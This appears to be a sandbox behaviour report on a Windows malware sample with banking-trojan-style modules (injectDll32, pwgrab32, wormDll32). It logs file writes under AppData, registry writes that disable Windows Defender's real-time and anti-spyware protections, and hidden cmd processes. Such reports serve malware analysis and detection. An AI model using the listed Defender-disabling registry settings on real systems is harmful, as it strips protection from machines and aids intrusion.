| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\shareDll32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | type = time |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\wormDll32 | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Read | settings.ini | size = 18319, size_out = 18319 |
|
1 | |
| Write | settings.ini | size = 12 |
|
2 | |
| Write | settings.ini | size = 2 |
|
249 | |
| Write | settings.ini | size = 36 |
|
8 | |
| Write | settings.ini | size = 48 |
|
5 | |
| Write | settings.ini | size = 68 |
|
5 | |
| Write | settings.ini | size = 65 |
|
3 | |
| Write | settings.ini | size = 43 |
|
5 | |
| Write | settings.ini | size = 71 |
|
2 | |
| Write | settings.ini | size = 53 |
|
3 | |
| Write | settings.ini | size = 75 |
|
3 | |
| Write | settings.ini | size = 21 |
|
7 | |
| Write | settings.ini | size = 61 |
|
4 | |
| Write | settings.ini | size = 45 |
|
3 | |
| Write | settings.ini | size = 41 |
|
4 | |
| Write | settings.ini | size = 23 |
|
4 | |
| Write | settings.ini | size = 83 |
|
5 | |
| Write | settings.ini | size = 34 |
|
4 | |
| Write | settings.ini | size = 24 |
|
4 | |
| Write | settings.ini | size = 31 |
|
3 | |
| Write | settings.ini | size = 49 |
|
3 | |
| Write | settings.ini | size = 54 |
|
2 | |
| Write | settings.ini | size = 38 |
|
4 | |
| Write | settings.ini | size = 57 |
|
2 | |
| Write | settings.ini | size = 67 |
|
6 | |
| Write | settings.ini | size = 29 |
|
7 | |
| Write | settings.ini | size = 80 |
|
4 | |
| Write | settings.ini | size = 33 |
|
2 | |
| Write | settings.ini | size = 17 |
|
3 | |
| Write | settings.ini | size = 81 |
|
7 | |
| Write | settings.ini | size = 85 |
|
4 | |
| Write | settings.ini | size = 62 |
|
4 | |
| Write | settings.ini | size = 72 |
|
4 | |
| Write | settings.ini | size = 66 |
|
3 | |
| Write | settings.ini | size = 77 |
|
4 | |
| Write | settings.ini | size = 63 |
|
7 | |
| Write | settings.ini | size = 76 |
|
4 | |
| Write | settings.ini | size = 58 |
|
4 | |
| Write | settings.ini | size = 78 |
|
3 | |
| Write | settings.ini | size = 15 |
|
3 | |
| Write | settings.ini | size = 19 |
|
4 | |
| Write | settings.ini | size = 26 |
|
4 | |
| Write | settings.ini | size = 22 |
|
3 | |
| Write | settings.ini | size = 13 |
|
2 | |
| Write | settings.ini | size = 70 |
|
4 | |
| Write | settings.ini | size = 47 |
|
2 | |
| Write | settings.ini | size = 64 |
|
1 | |
| Write | settings.ini | size = 27 |
|
1 | |
| Write | settings.ini | size = 37 |
|
2 | |
| Write | settings.ini | size = 87 |
|
1 | |
| Write | settings.ini | size = 18 |
|
5 | |
| Write | settings.ini | size = 14 |
|
1 | |
| Write | settings.ini | size = 52 |
|
2 | |
| Write | settings.ini | size = 39 |
|
2 | |
| Write | settings.ini | size = 91 |
|
1 | |
| Write | settings.ini | size = 11 |
|
1 | |
| Write | settings.ini | size = 16 |
|
4 | |
| Write | settings.ini | size = 74 |
|
3 | |
| Write | settings.ini | size = 86 |
|
2 | |
| Write | settings.ini | size = 69 |
|
4 | |
| Write | settings.ini | size = 55 |
|
3 | |
| Write | settings.ini | size = 56 |
|
3 | |
| Write | settings.ini | size = 88 |
|
1 | |
| Write | settings.ini | size = 28 |
|
1 | |
| Write | settings.ini | size = 44 |
|
3 | |
| Write | settings.ini | size = 20 |
|
3 | |
| Write | settings.ini | size = 32 |
|
4 | |
| Write | settings.ini | size = 79 |
|
3 | |
| Write | settings.ini | size = 51 |
|
3 | |
| Write | settings.ini | size = 35 |
|
3 | |
| Write | settings.ini | size = 73 |
|
3 | |
| Write | settings.ini | size = 30 |
|
1 | |
| Write | settings.ini | size = 46 |
|
3 | |
| Write | settings.ini | size = 25 |
|
4 | |
| Write | settings.ini | size = 117 |
|
1 | |
| Write | settings.ini | size = 169 |
|
1 | |
| Write | settings.ini | size = 10 |
|
1 | |
| Write | settings.ini | size = 2668 |
|
1 | |
| Write | settings.ini | size = 40 |
|
1 | |
| Write | settings.ini | size = 42 |
|
3 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | size = 16560 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | size = 16560 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | size = 592832 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | size = 132640 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | size = 85424 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dpost | size = 928 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | size = 1119072 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32_configs\dpost | size = 928 |
|
1 | |
| Write | settings.ini | size = 12 |
|
2 | |
| Write | settings.ini | size = 2 |
|
300 | |
| Write | settings.ini | size = 36 |
|
8 | |
| Write | settings.ini | size = 48 |
|
5 | |
| Write | settings.ini | size = 68 |
|
7 | |
| Write | settings.ini | size = 65 |
|
4 | |
| Write | settings.ini | size = 43 |
|
6 | |
| Write | settings.ini | size = 71 |
|
3 | |
| Write | settings.ini | size = 53 |
|
3 | |
| Write | settings.ini | size = 75 |
|
3 | |
| Write | settings.ini | size = 21 |
|
7 | |
| Write | settings.ini | size = 61 |
|
5 | |
| Write | settings.ini | size = 45 |
|
3 | |
| Write | settings.ini | size = 41 |
|
4 | |
| Write | settings.ini | size = 23 |
|
5 | |
| Write | settings.ini | size = 83 |
|
6 | |
| Write | settings.ini | size = 34 |
|
4 | |
| Write | settings.ini | size = 24 |
|
5 | |
| Write | settings.ini | size = 31 |
|
3 | |
| Write | settings.ini | size = 49 |
|
4 | |
| Write | settings.ini | size = 54 |
|
3 | |
| Write | settings.ini | size = 38 |
|
5 | |
| Write | settings.ini | size = 57 |
|
2 | |
| Write | settings.ini | size = 67 |
|
7 | |
| Write | settings.ini | size = 29 |
|
10 | |
| Write | settings.ini | size = 80 |
|
5 | |
| Write | settings.ini | size = 33 |
|
2 | |
| Write | settings.ini | size = 17 |
|
4 | |
| Write | settings.ini | size = 81 |
|
8 | |
| Write | settings.ini | size = 85 |
|
5 | |
| Write | settings.ini | size = 62 |
|
5 | |
| Write | settings.ini | size = 72 |
|
5 | |
| Write | settings.ini | size = 66 |
|
3 | |
| Write | settings.ini | size = 77 |
|
4 | |
| Write | settings.ini | size = 63 |
|
9 | |
| Write | settings.ini | size = 76 |
|
6 | |
| Write | settings.ini | size = 58 |
|
6 | |
| Write | settings.ini | size = 78 |
|
4 | |
| Write | settings.ini | size = 15 |
|
3 | |
| Write | settings.ini | size = 19 |
|
5 | |
| Write | settings.ini | size = 26 |
|
5 | |
| Write | settings.ini | size = 22 |
|
3 | |
| Write | settings.ini | size = 13 |
|
2 | |
| Write | settings.ini | size = 70 |
|
6 | |
| Write | settings.ini | size = 47 |
|
2 | |
| Write | settings.ini | size = 64 |
|
2 | |
| Write | settings.ini | size = 27 |
|
3 | |
| Write | settings.ini | size = 37 |
|
2 | |
| Write | settings.ini | size = 87 |
|
1 | |
| Write | settings.ini | size = 18 |
|
5 | |
| Write | settings.ini | size = 14 |
|
2 | |
| Write | settings.ini | size = 52 |
|
2 | |
| Write | settings.ini | size = 39 |
|
2 | |
| Write | settings.ini | size = 91 |
|
1 | |
| Write | settings.ini | size = 11 |
|
1 | |
| Write | settings.ini | size = 16 |
|
4 | |
| Write | settings.ini | size = 74 |
|
4 | |
| Write | settings.ini | size = 86 |
|
3 | |
| Write | settings.ini | size = 69 |
|
5 | |
| Write | settings.ini | size = 55 |
|
4 | |
| Write | settings.ini | size = 56 |
|
3 | |
| Write | settings.ini | size = 88 |
|
1 | |
| Write | settings.ini | size = 28 |
|
1 | |
| Write | settings.ini | size = 44 |
|
3 | |
| Write | settings.ini | size = 20 |
|
3 | |
| Write | settings.ini | size = 32 |
|
5 | |
| Write | settings.ini | size = 79 |
|
3 | |
| Write | settings.ini | size = 51 |
|
4 | |
| Write | settings.ini | size = 35 |
|
5 | |
| Write | settings.ini | size = 73 |
|
4 | |
| Write | settings.ini | size = 30 |
|
1 | |
| Write | settings.ini | size = 46 |
|
4 | |
| Write | settings.ini | size = 25 |
|
5 | |
| Write | settings.ini | size = 117 |
|
1 | |
| Write | settings.ini | size = 169 |
|
1 | |
| Write | settings.ini | size = 10 |
|
1 | |
| Write | settings.ini | size = 2860 |
|
1 | |
| Write | settings.ini | size = 40 |
|
2 | |
| Write | settings.ini | size = 42 |
|
4 | |
| Write | settings.ini | size = 50 |
|
1 | |
| Write | - | size = 19120 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\networkDll32_configs\dpost | size = 928 |
|
1 | |
| Write | - | size = 18608 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\psfin32_configs\dpost | size = 928 |
|
1 | |
| Write | - | size = 10464 |
|
1 | |
| Write | - | size = 53024 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\dinj | size = 132640 |
|
1 | |
| Write | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32_configs\sinj | size = 85424 |
|
1 |
Registry (9)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | - |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | value_name = DisableAntiSpyware, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableBehaviorMonitoring, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableOnAccessProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableOnRealtimeEnable, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | value_name = DisableIOAVProtection, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (1243)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | cmd | show_window = SW_HIDE |
|
1 | |
| Create | cmd | show_window = SW_HIDE |
|
1 | |
